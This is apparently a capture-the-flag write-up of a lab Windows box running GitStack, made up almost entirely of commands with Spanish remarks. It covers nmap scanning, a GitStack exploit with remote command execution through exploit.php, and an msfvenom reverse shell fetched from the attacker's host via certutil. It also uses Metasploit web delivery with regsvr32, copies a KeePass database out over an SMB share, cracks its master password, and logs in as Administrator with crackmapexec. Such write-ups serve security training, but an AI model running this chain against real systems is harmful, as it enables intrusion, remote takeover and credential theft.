nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.12 -oG allPorts

Pasted image 20210703125230.png

extractPorts allPorts

Pasted image 20210703125322.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001,49152,49153,49154 172.31.1.12 -oN targeted

Pasted image 20210703125712.png

nmap --script http-enum -p80 172.31.1.12 -oN webScan

Pasted image 20210703143628.png

whatweb 172.31.1.12:80

Pasted image 20210703143709.png

cat targeted

Pasted image 20210703143752.png

Vamos a la pagina web y parece ser que es algo con Django

Pasted image 20210703143918.png

Vamos a registration/login y podemos ver las credenciales:

Pasted image 20210703144048.png

Pasted image 20210703150858.png

searchsploit Gitstack

cat 43777.py

Vemos que hace el script

Pasted image 20210703152330.png

curl -X POST 172.31.1.12/web/exploit.php -d 'a=whoami'

Pasted image 20210703152929.png

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_gitstack.exe

curl -X POST 172.31.1.12/web/exploit.php -d 'a=certutil -urlcache -split -f http://10.10.0.12:8888/reverse_gitstack.exe'

python3 -m http.server 8888

nc -lvnp 4444

curl -X POST 172.31.1.12/web/exploit.php -d 'a=reverse_stack.exe'

Pasted image 20210703155420.png

El reverse shell no me funciono con el reverse_stack.exe se desconectaba a cada rato.

Pasted image 20210703170738.png

msf6>use exploit/multi/script/webdelivery msf6>set LHOST tun0 msf6> set TARGET 3 msf6>set payload windows/meterpreter/reverse_tcp msf6>run

Pasted image 20210703170640.png

curl -X POST 172.31.1.12/web/exploit.php -d 'a=regsvr32 /s /n /u /i:http//10.10.0.12:8080/EzA1or.sct scrobj.dll'

Pasted image 20210703170933.png

msf6>sessions -i 1 meterpreter > shell

Pasted image 20210703171410.png

Pasted image 20210703171908.png

python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder $(pwd)

Pasted image 20210703171836.png

copy password_manager.kdbx \\10.10.0.12\smbFolder

Pasted image 20210703173336.png

keepass2john password_manager.kdbx
keepass2john password_manager.kdbx > stackpass
cat stackpass | cut -d ":" -f 2 | tee stackpass
john stackpass

Pasted image 20210703173556.png

kpcli --kdb=password_manager.kdbx
princess
cd Database2/Windows/
show -f 0

Pasted image 20210703173907.png

crackmapexec winrm 172.31.1.12 -u Administrator -p 'secur3_apass262' -x 'whoami'

boxes

copyright©2022 Cu3rv0x all rights reserved